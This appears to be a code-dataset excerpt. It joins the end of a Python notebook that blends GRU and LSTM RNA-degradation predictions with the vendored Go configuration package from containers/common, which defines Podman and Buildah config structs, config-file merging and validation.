df2 = pd.DataFrame(result_private2_GRU[j+1])
df2.columns = ['reactivity', 'deg_Mg_pH10', 'deg_pH10','deg_Mg_50C','deg_50C',]
df2.insert(0, 'id_seqpos', 0)
df2=pd.concat([df2,df0])
for i in range(len(df2)):
df2.iloc[i,0]=id+'_{}'.format(i)
df1=pd.concat([df1,df2])
private_dataframe2=df1
# In[26]:
merged_dataframe=pd.concat([public_dataframe,private_dataframe1,private_dataframe2])
pre_submission_GRU=pd.merge(testindex,merged_dataframe)
# In[27]:
blend_preds_df = pd.DataFrame()
blend_preds_df['id_seqpos']=pre_submission_GRU['id_seqpos']
blend_preds_df['reactivity'] = .5*pre_submission_GRU['reactivity'] + .5*pre_submission_LSTM['reactivity']
blend_preds_df['deg_Mg_pH10'] = .5*pre_submission_GRU['deg_Mg_pH10'] + .5*pre_submission_LSTM['deg_Mg_pH10']
blend_preds_df['deg_pH10'] = .5*pre_submission_GRU['deg_pH10'] + .5*pre_submission_LSTM['deg_pH10']
blend_preds_df['deg_Mg_50C'] = .5*pre_submission_GRU['deg_Mg_50C'] + .5*pre_submission_LSTM['deg_Mg_50C']
blend_preds_df['deg_50C'] = .5*pre_submission_GRU['deg_50C'] + .5*pre_submission_LSTM['deg_50C']
blend_preds_df
# In[28]:
blend_preds_df.to_csv("submission.csv", index=False)
|
[] |
[] |
[
"PYTHONHASHSEED"
] |
[]
|
["PYTHONHASHSEED"]
|
python
| 1 | 0 | |
vendor/github.com/containers/common/pkg/config/config.go
|
package config
import (
"fmt"
"os"
"os/exec"
"path/filepath"
"sort"
"strings"
"sync"
"github.com/BurntSushi/toml"
"github.com/containers/common/pkg/capabilities"
"github.com/containers/storage/pkg/unshare"
units "github.com/docker/go-units"
selinux "github.com/opencontainers/selinux/go-selinux"
"github.com/pkg/errors"
"github.com/sirupsen/logrus"
)
const (
// _configPath is the path to the containers/containers.conf
// inside a given config directory.
_configPath = "containers/containers.conf"
// DefaultContainersConfig holds the default containers config path
DefaultContainersConfig = "/usr/share/" + _configPath
// OverrideContainersConfig holds the default config path overridden by the root user
OverrideContainersConfig = "/etc/" + _configPath
// UserOverrideContainersConfig holds the containers config path overridden by the rootless user
UserOverrideContainersConfig = ".config/" + _configPath
)
// RuntimeStateStore is a constant indicating which state store implementation
// should be used by engine
type RuntimeStateStore int
const (
// InvalidStateStore is an invalid state store
InvalidStateStore RuntimeStateStore = iota
// InMemoryStateStore is an in-memory state that will not persist data
// on containers and pods between engine instances or after system
// reboot
InMemoryStateStore RuntimeStateStore = iota
// SQLiteStateStore is a state backed by a SQLite database
// It is presently disabled
SQLiteStateStore RuntimeStateStore = iota
// BoltDBStateStore is a state backed by a BoltDB database
BoltDBStateStore RuntimeStateStore = iota
)
// Config contains configuration options for container tools
type Config struct {
// Containers specify settings that configure how containers will run ont the system
Containers ContainersConfig `toml:"containers"`
// Engine specifies how the container engine based on Engine will run
Engine EngineConfig `toml:"engine"`
// Machine specifies configurations of podman machine VMs
Machine MachineConfig `toml:"machine"`
// Network section defines the configuration of CNI Plugins
Network NetworkConfig `toml:"network"`
// Secret section defines configurations for the secret management
Secrets SecretConfig `toml:"secrets"`
}
// ContainersConfig represents the "containers" TOML config table
// containers global options for containers tools
type ContainersConfig struct {
// Devices to add to all containers
Devices []string `toml:"devices,omitempty"`
// Volumes to add to all containers
Volumes []string `toml:"volumes,omitempty"`
// ApparmorProfile is the apparmor profile name which is used as the
// default for the runtime.
ApparmorProfile string `toml:"apparmor_profile,omitempty"`
// Annotation to add to all containers
Annotations []string `toml:"annotations,omitempty"`
// Default way to create a cgroup namespace for the container
CgroupNS string `toml:"cgroupns,omitempty"`
// Default cgroup configuration
Cgroups string `toml:"cgroups,omitempty"`
// Capabilities to add to all containers.
DefaultCapabilities []string `toml:"default_capabilities,omitempty"`
// Sysctls to add to all containers.
DefaultSysctls []string `toml:"default_sysctls,omitempty"`
// DefaultUlimits specifies the default ulimits to apply to containers
DefaultUlimits []string `toml:"default_ulimits,omitempty"`
// DefaultMountsFile is the path to the default mounts file for testing
DefaultMountsFile string `toml:"-"`
// DNSServers set default DNS servers.
DNSServers []string `toml:"dns_servers,omitempty"`
// DNSOptions set default DNS options.
DNSOptions []string `toml:"dns_options,omitempty"`
// DNSSearches set default DNS search domains.
DNSSearches []string `toml:"dns_searches,omitempty"`
// EnableKeyring tells the container engines whether to create
// a kernel keyring for use within the container
EnableKeyring bool `toml:"keyring,omitempty"`
// EnableLabeling tells the container engines whether to use MAC
// Labeling to separate containers (SELinux)
EnableLabeling bool `toml:"label,omitempty"`
// Env is the environment variable list for container process.
Env []string `toml:"env,omitempty"`
// EnvHost Pass all host environment variables into the container.
EnvHost bool `toml:"env_host,omitempty"`
// HTTPProxy is the proxy environment variable list to apply to container process
HTTPProxy bool `toml:"http_proxy,omitempty"`
// Init tells container runtimes whether to run init inside the
// container that forwards signals and reaps processes.
Init bool `toml:"init,omitempty"`
// InitPath is the path for init to run if the Init bool is enabled
InitPath string `toml:"init_path,omitempty"`
// IPCNS way to to create a ipc namespace for the container
IPCNS string `toml:"ipcns,omitempty"`
// LogDriver for the container. For example: k8s-file and journald
LogDriver string `toml:"log_driver,omitempty"`
// LogSizeMax is the maximum number of bytes after which the log file
// will be truncated. It can be expressed as a human-friendly string
// that is parsed to bytes.
// Negative values indicate that the log file won't be truncated.
LogSizeMax int64 `toml:"log_size_max,omitempty,omitzero"`
// Specifies default format tag for container log messages.
// This is useful for creating a specific tag for container log messages.
// Containers logs default to truncated container ID as a tag.
LogTag string `toml:"log_tag,omitempty"`
// NetNS indicates how to create a network namespace for the container
NetNS string `toml:"netns,omitempty"`
// NoHosts tells container engine whether to create its own /etc/hosts
NoHosts bool `toml:"no_hosts,omitempty"`
// PidsLimit is the number of processes each container is restricted to
// by the cgroup process number controller.
PidsLimit int64 `toml:"pids_limit,omitempty,omitzero"`
// PidNS indicates how to create a pid namespace for the container
PidNS string `toml:"pidns,omitempty"`
// Copy the content from the underlying image into the newly created
// volume when the container is created instead of when it is started.
// If false, the container engine will not copy the content until
// the container is started. Setting it to true may have negative
// performance implications.
PrepareVolumeOnCreate bool `toml:"prepare_volume_on_create,omitempty"`
// RootlessNetworking depicts the "kind" of networking for rootless
// containers. Valid options are `slirp4netns` and `cni`. Default is
// `slirp4netns` on Linux, and `cni` on non-Linux OSes.
RootlessNetworking string `toml:"rootless_networking,omitempty"`
// SeccompProfile is the seccomp.json profile path which is used as the
// default for the runtime.
SeccompProfile string `toml:"seccomp_profile,omitempty"`
// ShmSize holds the size of /dev/shm.
ShmSize string `toml:"shm_size,omitempty"`
// TZ sets the timezone inside the container
TZ string `toml:"tz,omitempty"`
// Umask is the umask inside the container.
Umask string `toml:"umask,omitempty"`
// UTSNS indicates how to create a UTS namespace for the container
UTSNS string `toml:"utsns,omitempty"`
// UserNS indicates how to create a User namespace for the container
UserNS string `toml:"userns,omitempty"`
// UserNSSize how many UIDs to allocate for automatically created UserNS
UserNSSize int `toml:"userns_size,omitempty,omitzero"`
}
// EngineConfig contains configuration options used to set up a engine runtime
type EngineConfig struct {
// CgroupCheck indicates the configuration has been rewritten after an
// upgrade to Fedora 31 to change the default OCI runtime for cgroupv2v2.
CgroupCheck bool `toml:"cgroup_check,omitempty"`
// CGroupManager is the CGroup Manager to use Valid values are "cgroupfs"
// and "systemd".
CgroupManager string `toml:"cgroup_manager,omitempty"`
// NOTE: when changing this struct, make sure to update (*Config).Merge().
// ConmonEnvVars are environment variables to pass to the Conmon binary
// when it is launched.
ConmonEnvVars []string `toml:"conmon_env_vars,omitempty"`
// ConmonPath is the path to the Conmon binary used for managing containers.
// The first path pointing to a valid file will be used.
ConmonPath []string `toml:"conmon_path,omitempty"`
// DetachKeys is the sequence of keys used to detach a container.
DetachKeys string `toml:"detach_keys,omitempty"`
// EnablePortReservation determines whether engine will reserve ports on the
// host when they are forwarded to containers. When enabled, when ports are
// forwarded to containers, they are held open by conmon as long as the
// container is running, ensuring that they cannot be reused by other
// programs on the host. However, this can cause significant memory usage if
// a container has many ports forwarded to it. Disabling this can save
// memory.
EnablePortReservation bool `toml:"enable_port_reservation,omitempty"`
// Environment variables to be used when running the container engine (e.g., Podman, Buildah). For example "http_proxy=internal.proxy.company.com"
Env []string `toml:"env,omitempty"`
// EventsLogFilePath is where the events log is stored.
EventsLogFilePath string `toml:"events_logfile_path,omitempty"`
// EventsLogger determines where events should be logged.
EventsLogger string `toml:"events_logger,omitempty"`
// graphRoot internal stores the location of the graphroot
graphRoot string
// HelperBinariesDir is a list of directories which are used to search for
// helper binaries.
HelperBinariesDir []string `toml:"helper_binaries_dir"`
// configuration files. When the same filename is present in in
// multiple directories, the file in the directory listed last in
// this slice takes precedence.
HooksDir []string `toml:"hooks_dir,omitempty"`
// ImageBuildFormat (DEPRECATED) indicates the default image format to
// building container images. Should use ImageDefaultFormat
ImageBuildFormat string `toml:"image_build_format,omitempty"`
// ImageDefaultTransport is the default transport method used to fetch
// images.
ImageDefaultTransport string `toml:"image_default_transport,omitempty"`
// ImageParallelCopies indicates the maximum number of image layers
// to be copied simultaneously. If this is zero, container engines
// will fall back to containers/image defaults.
ImageParallelCopies uint `toml:"image_parallel_copies,omitempty,omitzero"`
// ImageDefaultFormat specified the manifest Type (oci, v2s2, or v2s1)
// to use when pulling, pushing, building container images. By default
// image pulled and pushed match the format of the source image.
// Building/committing defaults to OCI.
ImageDefaultFormat string `toml:"image_default_format,omitempty"`
// InfraCommand is the command run to start up a pod infra container.
InfraCommand string `toml:"infra_command,omitempty"`
// InfraImage is the image a pod infra container will use to manage
// namespaces.
InfraImage string `toml:"infra_image,omitempty"`
// InitPath is the path to the container-init binary.
InitPath string `toml:"init_path,omitempty"`
// LockType is the type of locking to use.
LockType string `toml:"lock_type,omitempty"`
// MachineEnabled indicates if Podman is running in a podman-machine VM
MachineEnabled bool `toml:"machine_enabled,omitempty"`
// MultiImageArchive - if true, the container engine allows for storing
// archives (e.g., of the docker-archive transport) with multiple
// images. By default, Podman creates single-image archives.
MultiImageArchive bool `toml:"multi_image_archive,omitempty"`
// Namespace is the engine namespace to use. Namespaces are used to create
// scopes to separate containers and pods in the state. When namespace is
// set, engine will only view containers and pods in the same namespace. All
// containers and pods created will default to the namespace set here. A
// namespace of "", the empty string, is equivalent to no namespace, and all
// containers and pods will be visible. The default namespace is "".
Namespace string `toml:"namespace,omitempty"`
// NetworkCmdPath is the path to the slirp4netns binary.
NetworkCmdPath string `toml:"network_cmd_path,omitempty"`
// NetworkCmdOptions is the default options to pass to the slirp4netns binary.
// For example "allow_host_loopback=true"
NetworkCmdOptions []string `toml:"network_cmd_options,omitempty"`
// NoPivotRoot sets whether to set no-pivot-root in the OCI runtime.
NoPivotRoot bool `toml:"no_pivot_root,omitempty"`
// NumLocks is the number of locks to make available for containers and
// pods.
NumLocks uint32 `toml:"num_locks,omitempty,omitzero"`
// OCIRuntime is the OCI runtime to use.
OCIRuntime string `toml:"runtime,omitempty"`
// OCIRuntimes are the set of configured OCI runtimes (default is runc).
OCIRuntimes map[string][]string `toml:"runtimes,omitempty"`
// PullPolicy determines whether to pull image before creating or running a container
// default is "missing"
PullPolicy string `toml:"pull_policy,omitempty"`
// Indicates whether the application should be running in Remote mode
Remote bool `toml:"remote,omitempty"`
// RemoteURI is deprecated, see ActiveService
// RemoteURI containers connection information used to connect to remote system.
RemoteURI string `toml:"remote_uri,omitempty"`
// RemoteIdentity is deprecated, ServiceDestinations
// RemoteIdentity key file for RemoteURI
RemoteIdentity string `toml:"remote_identity,omitempty"`
// ActiveService index to Destinations added v2.0.3
ActiveService string `toml:"active_service,omitempty"`
// ServiceDestinations mapped by service Names
ServiceDestinations map[string]Destination `toml:"service_destinations,omitempty"`
// RuntimePath is the path to OCI runtime binary for launching containers.
// The first path pointing to a valid file will be used This is used only
// when there are no OCIRuntime/OCIRuntimes defined. It is used only to be
// backward compatible with older versions of Podman.
RuntimePath []string `toml:"runtime_path,omitempty"`
// RuntimeSupportsJSON is the list of the OCI runtimes that support
// --format=json.
RuntimeSupportsJSON []string `toml:"runtime_supports_json,omitempty"`
// RuntimeSupportsNoCgroups is a list of OCI runtimes that support
// running containers without CGroups.
RuntimeSupportsNoCgroups []string `toml:"runtime_supports_nocgroup,omitempty"`
// RuntimeSupportsKVM is a list of OCI runtimes that support
// KVM separation for containers.
RuntimeSupportsKVM []string `toml:"runtime_supports_kvm,omitempty"`
// SetOptions contains a subset of config options. It's used to indicate if
// a given option has either been set by the user or by the parsed
// configuration file. If not, the corresponding option might be
// overwritten by values from the database. This behavior guarantees
// backwards compat with older version of libpod and Podman.
SetOptions
// SignaturePolicyPath is the path to a signature policy to use for
// validating images. If left empty, the containers/image default signature
// policy will be used.
SignaturePolicyPath string `toml:"-"`
// SDNotify tells container engine to allow containers to notify the host systemd of
// readiness using the SD_NOTIFY mechanism.
SDNotify bool `toml:"-"`
// StateType is the type of the backing state store. Avoid using multiple
// values for this with the same containers/storage configuration on the
// same system. Different state types do not interact, and each will see a
// separate set of containers, which may cause conflicts in
// containers/storage. As such this is not exposed via the config file.
StateType RuntimeStateStore `toml:"-"`
// ServiceTimeout is the number of seconds to wait without a connection
// before the `podman system service` times out and exits
ServiceTimeout uint `toml:"service_timeout,omitempty,omitzero"`
// StaticDir is the path to a persistent directory to store container
// files.
StaticDir string `toml:"static_dir,omitempty"`
// StopTimeout is the number of seconds to wait for container to exit
// before sending kill signal.
StopTimeout uint `toml:"stop_timeout,omitempty,omitzero"`
// ImageCopyTmpDir is the default location for storing temporary
// container image content, Can be overridden with the TMPDIR
// environment variable. If you specify "storage", then the
// location of the container/storage tmp directory will be used.
ImageCopyTmpDir string `toml:"image_copy_tmp_dir,omitempty"`
// TmpDir is the path to a temporary directory to store per-boot container
// files. Must be stored in a tmpfs.
TmpDir string `toml:"tmp_dir,omitempty"`
// VolumePath is the default location that named volumes will be created
// under. This convention is followed by the default volume driver, but
// may not be by other drivers.
VolumePath string `toml:"volume_path,omitempty"`
// VolumePlugins is a set of plugins that can be used as the backend for
// Podman named volumes. Each volume is specified as a name (what Podman
// will refer to the plugin as) mapped to a path, which must point to a
// Unix socket that conforms to the Volume Plugin specification.
VolumePlugins map[string]string `toml:"volume_plugins,omitempty"`
// ChownCopiedFiles tells the container engine whether to chown files copied
// into a container to the container's primary uid/gid.
ChownCopiedFiles bool `toml:"chown_copied_files,omitempty"`
}
// SetOptions contains a subset of options in a Config. It's used to indicate if
// a given option has either been set by the user or by a parsed engine
// configuration file. If not, the corresponding option might be overwritten by
// values from the database. This behavior guarantees backwards compat with
// older version of libpod and Podman.
type SetOptions struct {
// StorageConfigRunRootSet indicates if the RunRoot has been explicitly set
// by the config or by the user. It's required to guarantee backwards
// compatibility with older versions of libpod for which we must query the
// database configuration. Not included in the on-disk config.
StorageConfigRunRootSet bool `toml:"-"`
// StorageConfigGraphRootSet indicates if the RunRoot has been explicitly
// set by the config or by the user. It's required to guarantee backwards
// compatibility with older versions of libpod for which we must query the
// database configuration. Not included in the on-disk config.
StorageConfigGraphRootSet bool `toml:"-"`
// StorageConfigGraphDriverNameSet indicates if the GraphDriverName has been
// explicitly set by the config or by the user. It's required to guarantee
// backwards compatibility with older versions of libpod for which we must
// query the database configuration. Not included in the on-disk config.
StorageConfigGraphDriverNameSet bool `toml:"-"`
// StaticDirSet indicates if the StaticDir has been explicitly set by the
// config or by the user. It's required to guarantee backwards compatibility
// with older versions of libpod for which we must query the database
// configuration. Not included in the on-disk config.
StaticDirSet bool `toml:"-"`
// VolumePathSet indicates if the VolumePath has been explicitly set by the
// config or by the user. It's required to guarantee backwards compatibility
// with older versions of libpod for which we must query the database
// configuration. Not included in the on-disk config.
VolumePathSet bool `toml:"-"`
// TmpDirSet indicates if the TmpDir has been explicitly set by the config
// or by the user. It's required to guarantee backwards compatibility with
// older versions of libpod for which we must query the database
// configuration. Not included in the on-disk config.
TmpDirSet bool `toml:"-"`
}
// NetworkConfig represents the "network" TOML config table
type NetworkConfig struct {
// NetworkBackend determines what backend should be used for Podman's
// networking.
NetworkBackend string `toml:"network_backend,omitempty"`
// CNIPluginDirs is where CNI plugin binaries are stored.
CNIPluginDirs []string `toml:"cni_plugin_dirs,omitempty"`
// DefaultNetwork is the network name of the default CNI network
// to attach pods to.
DefaultNetwork string `toml:"default_network,omitempty"`
// DefaultSubnet is the subnet to be used for the default CNI network.
// If a network with the name given in DefaultNetwork is not present
// then a new network using this subnet will be created.
// Must be a valid IPv4 CIDR block.
DefaultSubnet string `toml:"default_subnet,omitempty"`
// NetworkConfigDir is where CNI network configuration files are stored.
NetworkConfigDir string `toml:"network_config_dir,omitempty"`
}
// SecretConfig represents the "secret" TOML config table
type SecretConfig struct {
// Driver specifies the secret driver to use.
// Current valid value:
// * file
// * pass
Driver string `toml:"driver,omitempty"`
// Opts contains driver specific options
Opts map[string]string `toml:"opts,omitempty"`
}
// MachineConfig represents the "machine" TOML config table
type MachineConfig struct {
// Number of CPU's a machine is created with.
CPUs uint64 `toml:"cpus,omitempty,omitzero"`
// DiskSize is the size of the disk in GB created when init-ing a podman-machine VM
DiskSize uint64 `toml:"disk_size,omitempty,omitzero"`
// MachineImage is the image used when init-ing a podman-machine VM
Image string `toml:"image,omitempty"`
// Memory in MB a machine is created with.
Memory uint64 `toml:"memory,omitempty,omitzero"`
}
// Destination represents destination for remote service
type Destination struct {
// URI, required. Example: ssh://[email protected]:22/run/podman/podman.sock
URI string `toml:"uri"`
// Identity file with ssh key, optional
Identity string `toml:"identity,omitempty"`
}
// NewConfig creates a new Config. It starts with an empty config and, if
// specified, merges the config at `userConfigPath` path. Depending if we're
// running as root or rootless, we then merge the system configuration followed
// by merging the default config (hard-coded default in memory).
// Note that the OCI runtime is hard-set to `crun` if we're running on a system
// with cgroupv2v2. Other OCI runtimes are not yet supporting cgroupv2v2. This
// might change in the future.
func NewConfig(userConfigPath string) (*Config, error) {
// Generate the default config for the system
config, err := DefaultConfig()
if err != nil {
return nil, err
}
// Now, gather the system configs and merge them as needed.
configs, err := systemConfigs()
if err != nil {
return nil, errors.Wrap(err, "finding config on system")
}
for _, path := range configs {
// Merge changes in later configs with the previous configs.
// Each config file that specified fields, will override the
// previous fields.
if err = readConfigFromFile(path, config); err != nil {
return nil, errors.Wrapf(err, "reading system config %q", path)
}
logrus.Debugf("Merged system config %q", path)
logrus.Tracef("%+v", config)
}
// If the caller specified a config path to use, then we read it to
// override the system defaults.
if userConfigPath != "" {
var err error
// readConfigFromFile reads in container config in the specified
// file and then merge changes with the current default.
if err = readConfigFromFile(userConfigPath, config); err != nil {
return nil, errors.Wrapf(err, "reading user config %q", userConfigPath)
}
logrus.Debugf("Merged user config %q", userConfigPath)
logrus.Tracef("%+v", config)
}
config.addCAPPrefix()
if err := config.Validate(); err != nil {
return nil, err
}
if err := config.setupEnv(); err != nil {
return nil, err
}
return config, nil
}
// readConfigFromFile reads the specified config file at `path` and attempts to
// unmarshal its content into a Config. The config param specifies the previous
// default config. If the path, only specifies a few fields in the Toml file
// the defaults from the config parameter will be used for all other fields.
func readConfigFromFile(path string, config *Config) error {
logrus.Tracef("Reading configuration file %q", path)
meta, err := toml.DecodeFile(path, config)
if err != nil {
return errors.Wrapf(err, "decode configuration %v", path)
}
keys := meta.Undecoded()
if len(keys) > 0 {
logrus.Debugf("Failed to decode the keys %q from %q.", keys, path)
}
return nil
}
// addConfigs will search one level in the config dirPath for config files
// If the dirPath does not exist, addConfigs will return nil
func addConfigs(dirPath string, configs []string) ([]string, error) {
newConfigs := []string{}
err := filepath.Walk(dirPath,
// WalkFunc to read additional configs
func(path string, info os.FileInfo, err error) error {
switch {
case err != nil:
// return error (could be a permission problem)
return err
case info == nil:
// this should only happen when err != nil but let's be sure
return nil
case info.IsDir():
if path != dirPath {
// make sure to not recurse into sub-directories
return filepath.SkipDir
}
// ignore directories
return nil
default:
// only add *.conf files
if strings.HasSuffix(path, ".conf") {
newConfigs = append(newConfigs, path)
}
return nil
}
},
)
if os.IsNotExist(err) {
err = nil
}
sort.Strings(newConfigs)
return append(configs, newConfigs...), err
}
// Returns the list of configuration files, if they exist in order of hierarchy.
// The files are read in order and each new file can/will override previous
// file settings.
func systemConfigs() ([]string, error) {
var err error
configs := []string{}
path := os.Getenv("CONTAINERS_CONF")
if path != "" {
if _, err := os.Stat(path); err != nil {
return nil, errors.Wrap(err, "CONTAINERS_CONF file")
}
return append(configs, path), nil
}
if _, err := os.Stat(DefaultContainersConfig); err == nil {
configs = append(configs, DefaultContainersConfig)
}
if _, err := os.Stat(OverrideContainersConfig); err == nil {
configs = append(configs, OverrideContainersConfig)
}
configs, err = addConfigs(OverrideContainersConfig+".d", configs)
if err != nil {
return nil, err
}
path, err = ifRootlessConfigPath()
if err != nil {
return nil, err
}
if path != "" {
if _, err := os.Stat(path); err == nil {
configs = append(configs, path)
}
configs, err = addConfigs(path+".d", configs)
if err != nil {
return nil, err
}
}
return configs, nil
}
// CheckCgroupsAndAdjustConfig checks if we're running rootless with the systemd
// cgroup manager. In case the user session isn't available, we're switching the
// cgroup manager to cgroupfs. Note, this only applies to rootless.
func (c *Config) CheckCgroupsAndAdjustConfig() {
if !unshare.IsRootless() || c.Engine.CgroupManager != SystemdCgroupsManager {
return
}
session := os.Getenv("DBUS_SESSION_BUS_ADDRESS")
hasSession := session != ""
if hasSession {
for _, part := range strings.Split(session, ",") {
if strings.HasPrefix(part, "unix:path=") {
_, err := os.Stat(strings.TrimPrefix(part, "unix:path="))
hasSession = err == nil
break
}
}
}
if !hasSession && unshare.GetRootlessUID() != 0 {
logrus.Warningf("The cgroupv2 manager is set to systemd but there is no systemd user session available")
logrus.Warningf("For using systemd, you may need to login using an user session")
logrus.Warningf("Alternatively, you can enable lingering with: `loginctl enable-linger %d` (possibly as root)", unshare.GetRootlessUID())
logrus.Warningf("Falling back to --cgroup-manager=cgroupfs")
c.Engine.CgroupManager = CgroupfsCgroupsManager
}
}
func (c *Config) addCAPPrefix() {
toCAPPrefixed := func(cap string) string {
if !strings.HasPrefix(strings.ToLower(cap), "cap_") {
return "CAP_" + strings.ToUpper(cap)
}
return cap
}
for i, cap := range c.Containers.DefaultCapabilities {
c.Containers.DefaultCapabilities[i] = toCAPPrefixed(cap)
}
}
// Validate is the main entry point for library configuration validation.
func (c *Config) Validate() error {
if err := c.Containers.Validate(); err != nil {
return errors.Wrap(err, "validating containers config")
}
if !c.Containers.EnableLabeling {
selinux.SetDisabled()
}
if err := c.Engine.Validate(); err != nil {
return errors.Wrap(err, "validating engine configs")
}
if err := c.Network.Validate(); err != nil {
return errors.Wrap(err, "validating network configs")
}
return nil
}
func (c *EngineConfig) findRuntime() string {
// Search for crun first followed by runc, kata, runsc
for _, name := range []string{"crun", "runc", "kata", "runsc"} {
for _, v := range c.OCIRuntimes[name] {
if _, err := os.Stat(v); err == nil {
return name
}
}
if path, err := exec.LookPath(name); err == nil {
logrus.Debugf("Found default OCI runtime %s path via PATH environment variable", path)
return name
}
}
return ""
}
// Validate is the main entry point for Engine configuration validation
// It returns an `error` on validation failure, otherwise
// `nil`.
func (c *EngineConfig) Validate() error {
if err := c.validatePaths(); err != nil {
return err
}
// Check if the pullPolicy from containers.conf is valid
// if it is invalid returns the error
pullPolicy := strings.ToLower(c.PullPolicy)
if _, err := ValidatePullPolicy(pullPolicy); err != nil {
return errors.Wrapf(err, "invalid pull type from containers.conf %q", c.PullPolicy)
}
return nil
}
// Validate is the main entry point for containers configuration validation
// It returns an `error` on validation failure, otherwise
// `nil`.
func (c *ContainersConfig) Validate() error {
if err := c.validateUlimits(); err != nil {
return err
}
if err := c.validateDevices(); err != nil {
return err
}
if err := c.validateTZ(); err != nil {
return err
}
if err := c.validateUmask(); err != nil {
return err
}
if c.LogSizeMax >= 0 && c.LogSizeMax < OCIBufSize {
return errors.Errorf("log size max should be negative or >= %d", OCIBufSize)
}
if _, err := units.FromHumanSize(c.ShmSize); err != nil {
return errors.Errorf("invalid --shm-size %s, %q", c.ShmSize, err)
}
return nil
}
// Validate is the main entry point for network configuration validation.
// The parameter `onExecution` specifies if the validation should include
// execution checks. It returns an `error` on validation failure, otherwise
// `nil`.
func (c *NetworkConfig) Validate() error {
expectedConfigDir := _cniConfigDir
if unshare.IsRootless() {
home, err := unshare.HomeDir()
if err != nil {
return err
}
expectedConfigDir = filepath.Join(home, _cniConfigDirRootless)
}
if c.NetworkConfigDir != expectedConfigDir {
err := isDirectory(c.NetworkConfigDir)
if err != nil && !os.IsNotExist(err) {
return errors.Wrapf(err, "invalid network_config_dir: %s", c.NetworkConfigDir)
}
}
if stringsEq(c.CNIPluginDirs, DefaultCNIPluginDirs) {
return nil
}
for _, pluginDir := range c.CNIPluginDirs {
if err := isDirectory(pluginDir); err == nil {
return nil
}
}
return errors.Errorf("invalid cni_plugin_dirs: %s", strings.Join(c.CNIPluginDirs, ","))
}
// FindConmon iterates over (*Config).ConmonPath and returns the path
// to first (version) matching conmon binary. If non is found, we try
// to do a path lookup of "conmon".
func (c *Config) FindConmon() (string, error) {
foundOutdatedConmon := false
for _, path := range c.Engine.ConmonPath {
stat, err := os.Stat(path)
if err != nil {
continue
}
if stat.IsDir() {
continue
}
if err := probeConmon(path); err != nil {
logrus.Warnf("Conmon at %s invalid: %v", path, err)
foundOutdatedConmon = true
continue
}
logrus.Debugf("Using conmon: %q", path)
return path, nil
}
// Search the $PATH as last fallback
if path, err := exec.LookPath("conmon"); err == nil {
if err := probeConmon(path); err != nil {
logrus.Warnf("Conmon at %s is invalid: %v", path, err)
foundOutdatedConmon = true
} else {
logrus.Debugf("Using conmon from $PATH: %q", path)
return path, nil
}
}
if foundOutdatedConmon {
return "", errors.Wrapf(ErrConmonOutdated,
"please update to v%d.%d.%d or later",
_conmonMinMajorVersion, _conmonMinMinorVersion, _conmonMinPatchVersion)
}
return "", errors.Wrapf(ErrInvalidArg,
"could not find a working conmon binary (configured options: %v)",
c.Engine.ConmonPath)
}
// GetDefaultEnv returns the environment variables for the container.
// It will check the HTTPProxy and HostEnv booleans and add the appropriate
// environment variables to the container.
func (c *Config) GetDefaultEnv() []string {
return c.GetDefaultEnvEx(c.Containers.EnvHost, c.Containers.HTTPProxy)
}
// GetDefaultEnvEx returns the environment variables for the container.
// It will check the HTTPProxy and HostEnv boolean parameters and return the appropriate
// environment variables for the container.
func (c *Config) GetDefaultEnvEx(envHost, httpProxy bool) []string {
var env []string
if envHost {
env = append(env, os.Environ()...)
} else if httpProxy {
proxy := []string{"http_proxy", "https_proxy", "ftp_proxy", "no_proxy", "HTTP_PROXY", "HTTPS_PROXY", "FTP_PROXY", "NO_PROXY"}
for _, p := range proxy {
if val, ok := os.LookupEnv(p); ok {
env = append(env, fmt.Sprintf("%s=%s", p, val))
}
}
}
return append(env, c.Containers.Env...)
}
// Capabilities returns the capabilities parses the Add and Drop capability
// list from the default capabiltiies for the container
func (c *Config) Capabilities(user string, addCapabilities, dropCapabilities []string) ([]string, error) {
userNotRoot := func(user string) bool {
if user == "" || user == "root" || user == "0" {
return false
}
return true
}
defaultCapabilities := c.Containers.DefaultCapabilities
if userNotRoot(user) {
defaultCapabilities = []string{}
}
return capabilities.MergeCapabilities(defaultCapabilities, addCapabilities, dropCapabilities)
}
// Device parses device mapping string to a src, dest & permissions string
// Valid values for device looklike:
// '/dev/sdc"
// '/dev/sdc:/dev/xvdc"
// '/dev/sdc:/dev/xvdc:rwm"
// '/dev/sdc:rm"
func Device(device string) (src, dst, permissions string, err error) {
permissions = "rwm"
split := strings.Split(device, ":")
switch len(split) {
case 3:
if !IsValidDeviceMode(split[2]) {
return "", "", "", errors.Errorf("invalid device mode: %s", split[2])
}
permissions = split[2]
fallthrough
case 2:
if IsValidDeviceMode(split[1]) {
permissions = split[1]
} else {
if split[1] == "" || split[1][0] != '/' {
return "", "", "", errors.Errorf("invalid device mode: %s", split[1])
}
dst = split[1]
}
fallthrough
case 1:
if !strings.HasPrefix(split[0], "/dev/") {
return "", "", "", errors.Errorf("invalid device mode: %s", split[0])
}
src = split[0]
default:
return "", "", "", errors.Errorf("invalid device specification: %s", device)
}
if dst == "" {
dst = src
}
return src, dst, permissions, nil
}
// IsValidDeviceMode checks if the mode for device is valid or not.
// IsValid mode is a composition of r (read), w (write), and m (mknod).
func IsValidDeviceMode(mode string) bool {
var legalDeviceMode = map[rune]bool{
'r': true,
'w': true,
'm': true,
}
if mode == "" {
return false
}
for _, c := range mode {
if !legalDeviceMode[c] {
return false
}
legalDeviceMode[c] = false
}
return true
}
// resolveHomeDir converts a path referencing the home directory via "~"
// to an absolute path
func resolveHomeDir(path string) (string, error) {
// check if the path references the home dir to avoid work
// don't use strings.HasPrefix(path, "~") as this doesn't match "~" alone
// use strings.HasPrefix(...) to not match "something/~/something"
if !(path == "~" || strings.HasPrefix(path, "~/")) {
// path does not reference home dir -> Nothing to do
return path, nil
}
// only get HomeDir when necessary
home, err := unshare.HomeDir()
if err != nil {
return "", err
}
// replace the first "~" (start of path) with the HomeDir to resolve "~"
return strings.Replace(path, "~", home, 1), nil
}
func rootlessConfigPath() (string, error) {
if configHome := os.Getenv("XDG_CONFIG_HOME"); configHome != "" {
return filepath.Join(configHome, _configPath), nil
}
home, err := unshare.HomeDir()
if err != nil {
return "", err
}
return filepath.Join(home, UserOverrideContainersConfig), nil
}
func stringsEq(a, b []string) bool {
if len(a) != len(b) {
return false
}
for i := range a {
if a[i] != b[i] {
return false
}
}
return true
}
var (
configErr error
configMutex sync.Mutex
config *Config
)
// Default returns the default container config.
// Configuration files will be read in the following files:
// * /usr/share/containers/containers.conf
// * /etc/containers/containers.conf
// * $HOME/.config/containers/containers.conf # When run in rootless mode
// Fields in latter files override defaults set in previous files and the
